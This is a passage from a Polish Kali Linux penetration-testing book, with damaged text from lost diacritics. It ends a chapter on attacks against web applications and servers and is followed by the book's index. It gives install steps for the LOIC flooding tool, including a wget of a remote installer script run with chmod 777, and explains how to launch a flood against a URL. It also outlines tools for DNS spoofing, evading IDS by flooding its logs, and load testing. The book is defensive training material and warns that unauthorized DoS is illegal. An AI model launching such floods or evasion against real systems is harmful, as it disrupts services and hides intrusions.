Powy ej mo esz zobaczy skutki ataku DoS na witryn httpwwwthesecuritybloggercom (prosimy niepowtarzaj tego eksperymentu)
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
263
LOIC czyli Niskoorbitalne Dzia o JonowehellipPakiet LOIC (ang Low Orbit Ion Cannon czyli wspomniane w tytule podrozdzia u Niskoorbital-ne Dzia o Jonowe) to narz dzie do badania odporno ci zasoboacutew sieciowych na przeci enieLOIC pozwala na sprawdzanie ilo ci ruchu sieciowego jaki mo e obs u y dany system Ta-kie informacje mog by poacute niej wykorzystywane do planowania rozbudowy i wdra ania sze-rokopasmowych po cze sieciowych Program ten sta si inspiracj do utworzenia innych
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
264
narz dzi o podobnej funkcjonalno ci takich jak na przyk ad JavaScript LOIC ktoacutere pozwalau ytkownikowi na przeprowadzanie testoacutew odporno ci na przeci enia po cze bezpo red-nio z poziomu przegl darki
Program LOIC by wykorzystywany przez grup Anonymous do przeprowadzenia s ynnychatakoacutew na wiele znanych internetowych witryn publicznych i rz dowych Niektoacuterzy prawnicyusi uj co prawda przekonywa e zastosowanie narz dzi takich jak LOIC jest w praktycebardzo podobne do odwiedzania danej witryny kilka tysi cy razy ale w wi kszo ci krajoacutewnieautoryzowane u ywanie tego typu narz dzi jest traktowane jako amanie prawa
Aby zainstalowa pakiet LOIC powiniene otworzy okno terminala i wpisa sekwencj po-lece przedstawion poni ej
apt-get updateaptitude install git-core monodevelopapt-get install mono-gmcs
Po zako czeniu tego etapu wykonaj polecenie cd Desktop aby przej do katalogu reprezentuj -cego pulpit a nast pnie utwoacuterz w nim podkatalog o nazwie loic Mo esz to zrobi za pomocpolecenia przedstawionego poni ej
mkdir loic
Przejd do nowo utworzonego katalogu za pomoc polecenia cd loic i wykonaj polecenieprzedstawione poni ej
wget httpsrawgithubcomnicolargoloicinstaller masterloicsh
Nast pnie nadaj skryptowi loicsh odpowiednie uprawnienia Aby to zrobi wykonaj kolejnepolecenie
chmod 777 loicsh
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
265
Ostatnim etapem jest uruchomienie skryptu za pomoc polecenia przedstawionego poni ej
loicsh install
Je eli na ekranie nie pojawi si aden komunikat o wyst pieniu b du to znaczy e jestegotowy do przeprowadzenia aktualizacji naszego bdquodzia a jonowegordquo Aby to zrobi wykonajnast puj ce polecenie
loicsh update
Po zako czeniu aktualizacji nadszed czas na uruchomienie programu LOIC Mo esz to zro-bi wpisuj c w oknie terminala nast puj ce polecenie
loicsh run
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
266
U ywanie programu LOIC nie jest trudne Na pocz tek mo esz wybra czy chcesz korzystaz trybu r cznego (ang manual mode) czy trybu IRC (ang IRC mode) W naszym przyk adziewybrali my tryb r czny
Nast pnie powiniene poda adres URL systemu ktoacutery chcesz zaatakowa W naszym przypadkuwpisali my adres lokalnego interfejsu p tli zwrotnej czyli 127001 Je eli chcesz zmodyfi-kowa domy lne ustawienia ataku LOIC oferuje wiele opcji dla protoko oacutew TCP oraz UDP
Kiedy b dziesz gotowy do rozpocz cia ataku powiniene klikn przycisk IMMA CHARGINMAH LAZER Post py ataku mo esz obserwowa w oknie programu Aby zatrzyma atakkliknij przycisk Stop Flooding
Inne narz dziaKali Linux oferuje inne narz dzia ktoacutere mo esz wykorzysta do przeprowadzania atakoacutew naaplikacje internetowe Poni ej zamieszczamy kroacutetkie zestawienie wybranych narz dzi ktoacuterenie by y do tej pory omawiane
DNSChef
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
267
Pakiet DNSChef to serwer DNS proxy przeznaczony dla pentesteroacutew i specjalistoacutew zajmuj -cych si analiz z o liwego oprogramowania Serwery DNS proxy to narz dzia bdquofa szuj cerdquoodpowiedzi DNS wykorzystywane do analizy ruchu sieciowego generowanego przez aplika-cje internetowe i wielu innych zastosowa DNS (ang Domain Name System) to rozproszonysystem przydzielania nazw zasoboacutew sieciowych takich jak komputery serwery us ugi siecio-we i inne zasoby sieciowe pod czone do internetu lub prywatnych sieci komputerowychCelowe dostarczanie fa szywych adresoacutew DNS mo e powodowa przekierowanie ruchu sie-ciowego do lokalizacji zupe nie innych ni oryginalne
Na przyk ad serwer DNS proxy mo e by wykorzystywany do utworzenia fa szywych odpo-wiedzi DNS powoduj cych e ruch dedykowany dla witryny CzarnyCharaktercom zamiastdo internetu b dzie trafia do lokalnego komputera analityka gdzie mo e by blokowany lubprzechwytywany w celu przeprowadzenia dok adniejszej analizy Aby to zrobi musisz uzy-ska dost p do jednego z serweroacutew DNS i odpowiednio zmodyfikowa wpisy DNS lub doko-na bdquozatruciardquo serwera DNS tak aby ruch sieciowy by przekierowywany do Twojego kom-putera z systemem Kali Linux Sama obs uga narz dzia DNSChef nie jest skomplikowanaaczkolwiek prawdziwym wyzwaniem mo e by atak na serwer DNS i przekierowanie ruchudo Twojego komputera
SniffJoke
SniffJoke pozwala na zupe nie przezroczyste przechwytywanie po cze TCP wprowadzaniedo nich opoacute nie modyfikowanie zawarto ci pakietoacutew oraz wstrzykiwanie fa szywych spre-parowanych pakietoacutew do sesji TCP u ytkownika Powoduje to e pasywne rozwi zania mo-nitoruj ce i zabezpieczaj ce ruch sieciowy takie jak systemy IDSIPS i sniffery maj du eproblemy z poprawn interpretacj po cze sieciowych Dzia anie programu wywo uje roacute -nice mi dzy ruchem sieciowym ktoacutery jest przechwytywany i przewidywany przez sniffera rzeczywistym ruchem sieciowym generowanym przez klienta w rezultacie czego algorytmybuduj ce bdquokonwersacjerdquo sieciowe dla sniffera maj problemy z poprawnym sk adaniem kolej-no ci pakietoacutew Na kolejnych dwoacutech rysunkach przedstawiamy proces przechwytywania ru-chu sieciowego mi dzy dwoma u ytkownikami bez udzia u pakietu SniffJoke oraz w sytuacjikiedy pakiet SniffJoke dzia a
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
268
SiegeSiege to narz dzie przeznaczone do testowania odporno ci na przeci enia po czeHTTPHTTPS pozwalaj ce deweloperom aplikacji internetowych na sprawdzanie zachowa-nia kodu aplikacji w skrajnych warunkach pracy Program Siege pozwala na wielow tkowegenerowanie sesji HTTP i analizowanie zachowania serweroacutew pod symulowanym obci eniemwielu u ytkownikoacutew Siege mo e pracowa w trybie regresji symulacji internetu oraz w trybiebrute-force
Aby uruchomi program Siege w systemie Kali Linux przejd do grupy Kali Linux i nast p-nie wykonaj polecenie Stress TestingNetwork Stress Testingsiege (zobacz pierwszy rysunekna nast pnej stronie)
Sk adnia wywo ania polecenia siege jest nast puj ca
siege [opcje] ltadres URL celugt
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
269
Rysunek przedstawiony poni ej przedstawia program Siege testuj cy witryn httpwwwthesecuritybloggercom Program domy lnie symuluje obci enie po czeniami od 15 u ytkow-
nikoacutew co zosta o przedstawione na rysunku poni ej Kiedy zatrzymasz dzia anie programuSiege generuje raport ktoacutery zosta zamieszczony na kolejnym rysunku
InundatorInundator to narz dzie pozwalaj ce na omijanie i neutralizowanie dzia ania systemoacutew IDS (angIntrusion Detection System) oraz IPS (ang Intrusion Protection System) poprzez bdquozalewanierdquo gene-rowanych przez nie dziennikoacutew spreparowanymi wpisami Koncepcja kryj ca si za takim rozwi -zaniem polega na tym e poprzez bdquozasypywanierdquo dziennikoacutew tysi cami fa szywie pozytywnych
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
270
wpisoacutew mo na ukry rzeczywisty atak ktoacutery staje si przez to potencjalnie bdquoniewidzialnyrdquo i ktoacutere-go poacute niejsza analiza ledcza jest mocno utrudniona Pakiet Inundator mo e by roacutewnie wy-korzystywany do testowania efektywno ci modu oacutew generuj cych alarmy w systemach SIEMczy IDSIPS
TCPReplayProgram TCPReplay wykorzystuje uprzednio przechwycony i zapisany w plikach w formacielibpcap ruch sieciowy do testowania dzia ania roacute nych urz dze sieciowych TCPReplay po-trafi rozpoznawa ruch generowany przez klienty i serwery modyfikowa nag oacutewki pakietoacutew2 3 i 4 warstwy oraz wstrzykiwa pakiety do sieci co pozwala na testowanie takich urz dze jakprze czniki routery zapory sieciowe czy systemy IDSIPS TCPReplay obs uguje roacute ne try-by pracy interfejsoacutew sieciowych
Moacutewi c w skroacutecie pakiet TCPReplay pozwala na przechwytywanie i zapisywanie ruchu sie-ciowego przesy anego mi dzy klientem a serwerem i nast pnie na retransmisj tego ruchu w do-wolnym czasie i miejscu w sieci
PodsumowanieOmawiane w tym rozdziale zagadnienia i oprogramowanie stanowi y dope nienie arsena utechnik i narz dzi ka dego pentestera aplikacji internetowych Po zako czeniu lektury powinieneju wiedzie jak zdobywa informacje o celach jak wyszukiwa podatno ci i luki w zabezpie-czeniach jak analizowa interakcje pomi dzy klientami a serwerami jak wykorzystywaexploity oraz luki w zabezpieczeniach oraz jak w razie potrzeby zak oacuteca dzia anie us ug interne-towych W tym i poprzednich rozdzia ach dokonali my kroacutetkiego przegl du narz dzi dost p-nych zaroacutewno w systemie Kali Linux jak i w internecie ktoacutere powinny si znale w arsenaleka dego specjalisty zajmuj cego si przeprowadzaniem testoacutew penetracyjnych Kali Linuxudost pnia wiele warto ciowych narz dzi aczkolwiek ka dy dobry pentester u ywa te w asnychskryptoacutew i programoacutew wykorzystuj cych luki typu Zero-Day Je eli chcesz by dobrym penteste-rem powiniene ustawicznie testowa nowe metody atakoacutew sprawdza roacute ne narz dzia penetra-cyjne i samodzielnie poszerza swoj wiedz na temat zagadnie omawianych w naszej ksi ce
W tym rozdziale omawiali my techniki b d ce niejako uwie czeniem ca ego procesu atako-wania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Poruszanetutaj by y zagadnienia zwi zane z prze amywaniem zabezpiecze aplikacji internetowychprzy u yciu atakoacutew na przegl darki atakoacutew z wykorzystaniem serweroacutew proxy oraz przechwyty-wania hase dost pu Rozdzia zako czyli my zagadnieniami zwi zanymi z zak oacutecaniem i przery-waniem dzia ania us ug sieciowych przy u yciu atakoacutew DoS oraz testowaniem odporno ciaplikacji i us ug sieciowych na prac w skrajnych warunkach obci enia
W nast pnym rozdziale zmienimy zupe nie front i wyja nimy jak przy u yciu narz dzi dost p-nych w systemie Kali Linux chroni aplikacje internetowe przed atakami pentesteroacutew i hakeroacutew
Kup książkę Poleć książkę
Skorowidz
Aacccheck 228Active Directory 171 194ADC 286 287adres URL definiowanie 254adresy IP sfa szowane 285aktualizacje 275
harmonogram 276zabezpiecze systemu 276
ALE 31analiza
bitowych obrazoacutew dyskoacutew 295list wyrazoacutew 189pakietoacutew sieciowych 206plikoacutew binarnych
zawieraj cychoprogramowanie firmware298
ruchu sieciowego 212s ownikoacutew 189sygnatur plikoacutew 299systemu plikoacutew 291 298zawarto ci plikoacutew indexdat
299zawarto ci plikoacutew PDF 299
da HTTP 203aplet Java 156aplikacje internetowe 23
b dy w zabezpieczeniach286
wykrywanie i mapowanie 241zakres testoacutew penetracyjnych
23Application Layer Attacks 257apt-get install httrack 66architektura klient-serwer 91ARO 31ARP 212
ARP address flooding 142ARP Spoofing 141arpspoof 141 212ataki
brute-force 125 170DDoS 256DoS 255hybrydowe 170LFI 254man-in-the-middle 139 211metod si ow 125na aplikacje internetowe 231na bazy danych 219 222na cele w internecie 250na klienty aplikacji
internetowych 147na parametry metod GET
i POST 131na protoko y komunikacyjne
256na serwery aplikacji
internetowych 92na serwery DNS 71na serwery WWW 231na warstw aplikacji 257na zarz dzanie sesjami 195na dania Form 131na dania HTTP 134powoduj ce wyczerpanie
zasoboacutew sesji 257przechwytywanie sesji 197RFI 254s ownikowe 169 228socjotechniczne 148 151
amanie hase 169SSL stripping 140SSL-Exhaustion 257THC-SSL-DOS 257
wykorzystuj ce przeci eniepo cze sieciowych 256
XSS 223 248z klonowaniem 151z u yciem narz dzi
penetracyjnych opartychna przegl darkach 236
audytbezpiecze stwa 21 28serweroacutew WWW 92sesji WWW 199 203warto 301
Authentication hijacking 225Autopsy 295AV 31
BBackTrack 38badanie zasoboacutew sieci
komputerowych 65bazy danych 218BeEF 232
panel zarz dzania pakietu 234przechwycony system 235
bezpiecze stwo sesji HTTP 281bezpiecze stwo systemu 272
a testy penetracyjne 32czynnik ludzki 148instalowanie oprogramowania
i urz dze 274podstawowe wymogi 273
bia e pude ko 24Binwalk 298bitowe kopie no nikoacutew danych
288 291narz dzia 293partycje 292suma kontrolna 294
Kup książkę Poleć książkę
Skorowidz
330
black-box 24 30BootKey 171 173Browser Exploitation
Framework 232brute-force 125 170
amanie hase 171bulk_extractor 300BURP 236BURP Proxy 238
Intercept 241opcje konfiguracyjne 239
Burp Spider 241 244Burp Suite 238
Ccs 139CAC 194Cain and Abel 173Center for Internet Security 275certyfikaty
CEH 311CISSP 31 193g oacutewnego urz du certyfikacji
106GPEN 311raport ko cowy 310SSL 106 282z podpisem w asnym 282
chkrootkit 295chntpw 180
uruchomienie w Kali Linux182
ciasteczka 197edytowanie zawarto ci 199
201niezabezpieczone 208obrona przed
przechwytywaniem 286przegl danie 201uwierzytelniaj ce ofiary 198wstrzykiwanie 198wykradanie 198 208 225zarz dzanie 200
ci g zaburzaj cy 170Cisco Network Foundation
Protection 275CISSP 193Clickjacking 196
kod roacuted owy stron 197obrona przed atakiem 287
CmosPwd 190
Cookie Cadger 203dane o sesji 204
Cookie Injector 200cookie injector tool 198cookies 197Cookies Manager+ 198 201COTS 231cracks per second 139Crackstation 278creddump 191cross-site scripting 223Crunch 169 185
znaki specjalne 186CutyCapt 327czarne pude ko 24
DDBPwAudit 229dc3dd 293 297dd 291DDoS 256
kategorie atakoacutew 256obrona przed atakiem 285
Debian 38Denial of Service 256dictstat 189Dig 71DirBuster 128
raport 130Distributed Denial of Service
256DNS 267DNSChef 266dokumentacja 306DoS 256
kategorie atakoacutew 256obrona przed atakiem 285
dost p do systemualternatywny 37techniki XSS 225
dost pno 30Dradis 325Driftnet 217dsniff 212
nas uchiwaniei przechwytywaniepakietoacutew 213
uruchamianie 214dual-boot configuration 44
EEDGAR 57EF 31ekspertyza ledcza 289e-mail relay server 124encrypted passwords 137Equifax Secure Certificate
Authority 282Ettercap 214
lista celoacutew 216skanowanie sieci 216
Exploitation Tools 36 37 48exploity 92 113
Reserve_TCP Meterpreter156
Ffa szywe
adresy IP 285odpowiedzi DNS 267witryny 159 252
Ferret 209uruchamianie 210
FHS 38Fierce 73Fimap 254findmyhash 190fingerprinting 93Firefox wtyczki 198 236Firesheep 199FOCA 84
utworzenie nowego projektu84
Foremost 299Forensics 48 290FoxyProxy 236fping 70funkcja skroacutetu 170
kopie no nikoacutew danych 288fuzzing aplikacji internetowych 93
Ggenerator
hase 278adunkoacutew 132
GHDB 63GIT 250glosariusz 319
Kup książkę Poleć książkę
Skorowidz
331
Google hacking 61Google Hacking Database 63Google Internet Authority 282GPU 177Greasemonkey 200grey-box 25 30gromadzenie danych 34GRUB 44Gruyere 224 246
instancja projektu 225
HHackBar 219Hak5 Pineapple 211Hamster 208Hardware Hacking 48hashcat 177hashed passwords 137Hash-identifier 188has a 137
dost pu 250generowanie listy 185amanie 169
ochrona 170polityka zarz dzania 277przechowywanie 278przechwytywanie 157 169
249si a 277w systemie Linux 173w systemie Windows 171
haszowanie 170z dodatkiem soli
kryptograficznej 170hexinject 228hiper cza spreparowane 196home feed option 163hosty skanowanie 162HTTrack 66 279Hydra 125
uruchomienie 128
IICMP Echo Request 70identyfikacja
adresoacutew URL 227celoacutew za pomoc serweroacutew
DNS 73obszaroacutew krytycznych 27typoacutew haszowanych warto ci
188
iFrame 196Information Gathering 34 46informatyka ledcza 287
zasady 288integralno 30intercept proxy 105interfejs p tli zwrotnej 239Inundator 269in ynieria
spo eczna 148wsteczna 48
ionCube Loader 64IP Forwarding 141IPSIDS 231iptables 142
Jj zyk SQL 218John the Ripper 137 173
domy lna konfiguracjacie ek 176
haszowanie 170amanie hase 174
proces 137amanie pliku hase 139
s owniki 138 177szybko dzia ania 138
Johnny 138amanie hase 174
opcje konfiguracyjneprogramu 175
s owniki 177uruchamianie 175
KKali Linux 15
aktualizacja pakietu SET 150instalowanie 40
pakietoacutew 43konfiguracja 39Live CD 180 290minimalne wymagania
sprz towe 40narz dzia dost pne
w systemie 46Network Install 40proces konfigurowania
partycji dysku 42publiczny adres IP 225s owniki 129
uruchamianiew maszynie wirtualnej 46w trybie Forensics 290z no nika zewn trznego 39
wprowadzenie do systemu 38karty dost pu 194KeepNote 326klienty 91 147
aplikacji internetowych 169191
HTTP 262klonowanie
rodowiska 278witryny internetowej 66 153
158 251 279klucze uruchamiania systemu
171 173komunikaty
ICMP 70o up ywie czasu dania 70
kopiowanie plikoacutew SAMi SYSTEM z hosta 172
LLinux amanie hase 173lista
adresoacutew URL 227potencjalnych hase 185
listener port 142Live HTTP Headers 134Local File Inclusion 254Logical Volume Manager 43LOIC 263
tryby 266luki w zabezpieczeniach
aktualizacja bazy 276aplikacji internetowych 245
254hostoacutew 167przegl darek 232raport ko cowy 315systemoacutew poczty
elektronicznej 123usuwanie 276wstrzykiwanie kodu SQL 221wstrzykiwanie skryptoacutew 223wykorzystywanie 113wyszukiwanie 92
LVM 43
Kup książkę Poleć książkę
Skorowidz
332
adunek 117amanie hase 137 169
bezp atne us ugi sieciowe190
haszowanych 189maska 189narz dzia 174przechowywanych w plikach
systemowych 169si owe 229systemu Linux 173techniki 169za pomoc John the Ripper
174zabezpieczaj cych BIOS
komputera 190cza modyfikacja 196
MMAC 172MagicTree 327Maintaining Access 38 48Maltego 58 74
zadania 76Maltego CaseFile 326man-in-the-middle 139 211
obrona przed atakiem 281przeprowadzanie manualne
212maska 189mechanizmy
HSTS 140klonowania 153obronne 231 271
testowanie 273pasywnego nas uchiwania 208renegocjacji bezpiecznego
po czenia SSL 257usuwania mi kkich b doacutew
404 93mened er LVM 43metadane 83
wyszukiwanie i analiza 83Metasploit 113 154
skanowanie sieci lokalnej 114wersja konsolowa 114
meterpreter 151uruchomienie sesji 156wykorzystanie 156
metodologiacertyfikacji CISSP 193testoacutew penetracyjnych 24
310 323metody
pojedynczegouwierzytelniania 194
szyfrowania 283mirror server 43MitM Proxy 161montowanie dyskoacutew z systemem
Windows 172
Nnag oacutewki X-Frame-Options 287narz dzia
do klonowania witryn 281do amania hase 174do przechwytywania sesji
198do przeprowadzania atakoacutew
DoSDDoS 285ledcze 295
wspomagaj ce tworzenieraportoacutew 325
nas uchiwaniepakietoacutew sieciowych 199ruchu sieciowego 143 228
nazwy DNS 71Nessus 162
HomeFeed 163instalowanie w systemie
Kali Linux 163ProfessionalFeed 163raporty 167 168skanowanie hostoacutew 166uruchomienie 164u ywanie 164
Netcat 124NetFlow 286NGIPS 236Niskoorbitalne Dzia o Jonowe
263Nmap 76
agresywne skanowanie 79graficzny interfejs
u ytkownika 77okno wynikoacutew skanowania 82opcje 79
NoScript 287no niki danych 288
Oobrona przed atakami
Clickjacking 287DoS 285man-in-the-middle 281przechwytywanie ciasteczek
286SSLstrip 284
ocena ryzyka 30formu y 31okna serwisowe 277
ocl 178oclHashcat 177odgadywanie hase 169okna serwisowe 277Ophcrack 183
uruchomienie w Kali Linux184
osobista weryfikacja to samo ci194
oszacowanie bezpiecze stwa 21o wiadczenie o zachowaniu
poufno ci 307otwarta implementacja sterownikoacutew
kart graficznych 178Owasp-Zap 105 245
automatyczne logowanie 110konfigurowanie przegl darki
108mechanizm aktualizacji ca ego
pakietu 110proces uwierzytelniania 109przeprowadzanie atakoacutew 109raporty 111
PPAE 39pakiety
ARP 212czas ycia 259MitM Proxy 161SET 149 249sieciowe 259TCP 259
pami masowa urz dze 289partycje 172
wymiany 291Pasco 299Password Attacks 37 47 174Patator 229
Kup książkę Poleć książkę
Skorowidz
333
pdf-parser 299pentesterzy 15phishing email 159phrasendrescher 190PIV 194pliki
binarne 298CLF 227indexdat 299Robotstxt 53SAM 171 178 180
wydobycie zawarto ci 173SEED 247shadow 173strefowe 71wyszukiwanie i odzyskiwanie
299poczta elektroniczna 123
fa szywe wiadomo ci 159podatno na atak 29
aktualizacja bazy 276aplikacji internetowych 245
254ocena ryzyka 30przegl darki 232raport ko cowy 315skanowanie 30usuwanie 276wyszukiwanie 92XSS 223 226
podnoszenie uprawnie 37podstawowe wymogi
bezpiecze stwa 303podsumowanie ustale 313polecenia
apt-get install 233apt-get update 233arpspoof 142binwalk 298bkhive 173bkhive SYSTEM bootkey 180bkreg 173chntpw -i 183chntpw -l SAM 181cp 139Data 124db_nmap 115dc3dd 293expand 171exploit 119fdisk 172fierce 123fping 70
getsystem 222git 150HELO 124host 114ifconfig 140ifdown 140iptables 141 142john -test 138MAIL FROM 124md5sum 297msfcli 113msfconsole 113msfgui 113netcat 124ping 70protoko u SMTP 124RCPT TO 124route -n 141samdump 173samdump SAM bootkey 180services 114 115sessions -I 1 157set payload 117sfdisk -l 291sha256sum 294show options 117 118show payloads 117sqlmap 222SYSKEY 173traceroute 69use 116
polityka zarz dzania has ami 277po czenia
HTTP 268HTTPS 268
po czeniaTCP 267troacutejetapowe 79VPN 282
poprawki zabezpiecze 275harmonogram instalowania 276proces zarz dzania 276
porty443 1198080 108 245komunikacyjne 118nas uchuj ce 142
poufno 30poziom zabezpiecze
minimalny 274podstawowy 274
PREROUTING 143
Privilege Escalation 37produkty z poacute ki 231professional feed option 163projekty
Emily 59Gruyere 224 246
promiscuous mode 47Protocol Attacks 256protoko y
8021x 283HTTPS 282MACsec 283routingu 285SSL 257SSLTLS 30 281 286TLS 281
ProxyStrike 98robot sieciowy 100
przechwytywanieciasteczek 197 209 286danych logowania
u ytkownikoacutew 211hase 169 249nazw kont i hase 157obrazoacutew przesy anych
w sieci 217pakietoacutew 213
sieciowych 210TCP 259
przechwytywaniepo cze 161
TCP 267ruchu HTTP oraz HTTPS 238ruchu sieciowego 207 267
270sesji 197 208 233
narz dzia 198przegl d projektu 306przegl darki 232
ochrona przed atakami 236zabezpieczenia 249
przekazywanie pakietoacutew IP 142212
przekierowaniepo cze 284portoacutew komunikacyjnych
142ruchu sieciowego 141sesji 284
przestrze celoacutew 27przetwarzanie wielow tkowe 262PwDump 173
Kup książkę Poleć książkę
Skorowidz
334
RRainbow Tables 47 170RainbowCrack 170 189ramy czasowe 308raport ko cowy
b dy 302dodatki 319dokumentacja 306format 307glosariusz 319informacje o metodologii 310konsekwencje 302narz dzia wspomagaj ce
tworzenie 325o wiadczenie o zachowaniu
poufno ci 307podatno ci i luki
w zabezpieczeniach 315podsumowanie ustale 313
zestawienie elementoacutew 315prezentacja 302przegl d projektu 306ramy czasowe projektu 308specyfikacja 28streszczenie 309strona tytu owa 307szczegoacute owe procedury
testowania 312tworzenie 301us ugi profesjonalne 304wersja ko cowa 306wersja robocza 306wnioski i rekomendacje
dla rodowiska sieciowego316
wymagania 303wype nianie szablonu 306zakres projektu 306zarz dzanie wersjami
dokumentacji 308zgodno ze standardami
i procedurami 303rcracki_mt 189Regional Internet Registries 57rekomendacje 316
powykonawcze 28rekonesans 34 51
badanie zasoboacutew siecikomputerowych 65
Google hacking 61
Google Hacking Database 63lokalizacja 60oferty pracy 59plik Robotstxt 53regionalni administratorzy
adresoacutew IP 57rozpoznanie wst pne 53sieciowy 65strona internetowa firmy 53system EDGAR 57wyszukiwarka Shodan 60z wykorzystaniem protoko u
ICMP 69z wykorzystaniem serweroacutew
DNS 71zadania 52zasoby serwisoacutew
spo eczno ciowych 58zaufanie 59roacuted a przechowuj cehistoryczne wersje witryninternetowych 54
rekordy zasobowe 71Remote File Inclusion 254renegocjacja sesji SSL 258Reporting Tools 48Reverse Engineering 48rich-text 326robot sieciowy 93 100 241roczna oczekiwana strata 31roczny wska nik wyst pienia
zdarzenia 31rootkit 295rozsy anie spreparowanych
pakietoacutew ARP 141rozszerzenia PAE 39ruch sieciowy 206
adresy URL 227man-in-the-middle 212monitorowanie 227nas uchiwanie 143 228przechwytywanie 267 270przekierowanie 213sprawdzanie ilo ci 263urz dzenia monitoruj ce 285
SSAM 171samdump2 178Scalpel 299
Scapy 257 259scenariusze atakoacutew 260
security assessment 21security audit 21serwery 91
aplikacji internetowych 92223zabezpieczanie 136 249
atakowanie 262limit roacutewnoleg ych sesji 262poczty elektronicznej 123proxy 98 105 236
wykorzystanie 238Samba 116sieciowe 91WWW 262
serwery DNSidentyfikacja celoacutew 73proxy 267rekonesans 71
serwisy spo eczno ciowe 58sesja 195
ciasteczka 197logowania 205mechanizmy bezpiecze stwa
195Session Exhaustion 257session fixation attack 195session hijacking 197SET 149 249
adres IP sklonowanej witryny158
aplet Java 156Credential Harvester Attacks
157Exploit to deliver 154importowanie w asnych
plikoacutew witrynyinternetowej 158
IP addresshostname forreverse connection 154
mechanizmy chroni ceprzeprowadzany atak 155
NATPort forwarding 154przechwycenie nazw kont
i hase 157raport o zdarzeniu 160raporty 253rozsy anie fa szywych
wiadomo ci 159URL you want to clone 154
Kup książkę Poleć książkę
Skorowidz
335
uruchomienie 151utworzenie kopii witryny 153zastosowanie do ataku
z klonowaniem 151SharePoint 151Shodan 60Sidejacking 208Siege 268skanery
biometryczne 194stron internetowych 246
skanowanieadresoacutew URL 93agresywne 79celoacutew 35hostoacutew 162podatno ci na ataki 30 32portoacutew 93witryny 255z wykorzystaniem protoko u
ICMP 70Skipfish 95
raport 97s owniki 96
skryptyopakowuj ce 228wykrywanie
nieautoryzowanychskryptoacutew 287
XSS 224 226SLE 31Slowloris 261s owa kluczowe
dbs 222FUZZ 133 135tables 222
sniffer 267Sniffing and Spoofing 48SniffJoke 267Social Engineer Toolkit 149social engineering 16 148SOW 319spodziewana jednorazowa strata
31sqlmap 221SSL stripping 140SSLstrip 140 197 211
konfigurowanieprzekierowania portoacutew 142
mechanizm dzia ania 284obrona przed atakiem 284rozpocz cie ataku 141
SSO 194
standardy 28 304status testu 24 27STIG 274strategia ataku 36Stress Testing 48strony WWW 241suma kontrolna 293
baza 298sygnatury plikoacutew 299SYSKEY 171System services 48systemy
BeEF 59EDGAR 57IDS 93 269IPS 269NGIPS 236roacutewnowa enia obci enia
i filtrowania zawarto ci 286SCADA 60SIEM 270z kartami dost pu 194zabezpiecze 231
szablony witryn 251szare pude ko 24szyfrowane po czenia
https 197VPN 282
Ttablice t czowe 170 189
amanie hase systemuWindows 183
Tamper Data 125TCPReplay 270Tenable 163testowanie
dzia ania roacute nych urz dzesieciowych 270
mechanizmoacutew obronnych 273odporno ci na przeci enia
268podatno ci na ataki XSS 224sklonowanego rodowiska
279testy
o nieograniczonym zakresiedzia ania 26
odporno ci na przeci eniesystemu 256
warunkoacutew skrajnych 256
testy penetracyjne 21a skanowanie podatno ci 32aplikacji internetowych 23bezpiecze stwo zasoboacutew 32cele 22 255etapy 24 34okre lenie poziomu
zabezpiecze 307pomy lno 33przeprowadzanie 32 33socjotechniczne 149w asnego rodowiska 272 273z wykorzystaniem systemu
Kali Linux 34zakres prac 25 26zewn trzne 321zgoda w a ciciela 33
THX-SSL-DOS 257tokeny 194
sesji 197transfery stref 71 73triada CIA 30tryb nas uchiwania 207 215ttl 259
Uumowy
oczekiwania klienta 317potencjalne problemy
i zagadnienia 324rozliczane wed ug zu ycia
czasu i zasoboacutew 305wykaz prac 319ze sta cen 304
unattended installation 39Unicast RPF 285urlsnarf 227usermap_script 116us ugi
NAT 251profesjonalne 304w chmurze 211
usuwanie ladoacutew w amania 38utrzymanie zdobytego
przyczoacute ka 37uwierzytelnianie 193
ataki s ownikowe 228dodatkowe rozwi zania 194dwusk adnikowe 283pojedyncze 194u ytkownikoacutew 193wielosk adnikowe 193
Kup książkę Poleć książkę
Skorowidz
336
VVega 101
modu serwera proxy 104zestawienie znalezionych
podatno ci 104Volume Based Attacks 256Vulnerability Analysis 35 46vulnerability assessment 32
Ww3af 120
wykorzystanie znalezionychpodatno ci i lukw zabezpieczeniach 122
w3mir 281warto
ryzyka 32sumy kontrolnej 293zasobu 31
WayBack Machine 54Web Applications 47Web Developer 199WebCopier 281Webshag 92
obs uga programu 93raport 95
WebSlayer 131atak na dania HTTP 134generator adunkoacutew 132
Websploit 112weryfikacja po cze HTTPS 281white-box 25 30Windows 171
ataki typu offline 171lista kont u ytkownikoacutew 181montowanie dyskoacutew 172odczytywanie i zapisywanie
plikoacutew 172partycja systemu 172uzyskanie dost pu do
systemu 180Windows Reverse_TCP
Meterpreter 154Wireless Attacks 47Wireshark 206
filtrowanie 208wirtualne rodowisko testowe 279wska nik ekspozycji 31wstrzykiwanie
ciasteczek 198kodu 248
kodu SQL 218pakietoacutew 228skryptoacutew 223
wtyczki przegl darki Firefox 198wykaz prac
dodatkowe elementy 323dodatkowe uzgodnienia
prawne 323koszty us ug 323lista narz dzi 324metodologia testoacutew 323oczekiwania
i odpowiedzialno 323szczegoacute owy 319uwierzytelnianie 324zewn trzne testy
penetracyjne 321wykorzystywanie
b doacutew w zabezpieczeniachprzegl darki 196
exploitoacutew 92luk w zabezpieczeniach 113
254systemoacutew poczty
elektronicznej 123zidentyfikowanych
podatno ci 36 254wymogi bezpiecze stwa 273wyszukiwanie
luk w zabezpieczeniach 92 221metadanych 83podatno ci 29 35 92
wytyczne 28 304
XXSS 223
aplikacje internetowe 248testowanie podatno ci 224
XSS cookie stealing 225
Zzabezpieczanie
serweroacutew aplikacjiinternetowych 249
systemoacutew pod czonychdo internetu 271
zakres prac 319cel testu 33definicja
przestrzeni celoacutew 27systemoacutew 26
zdobycia flagi 28dokument 25identyfikacja obszaroacutew
krytycznych 27materia y i raporty 33metody testowania 26narz dzia 27oprogramowanie 27osoby powiadomione o
planowanym te cie 27pocz tkowy status testu 27ramy czasowe testu 26 308reakcja na proacuteby
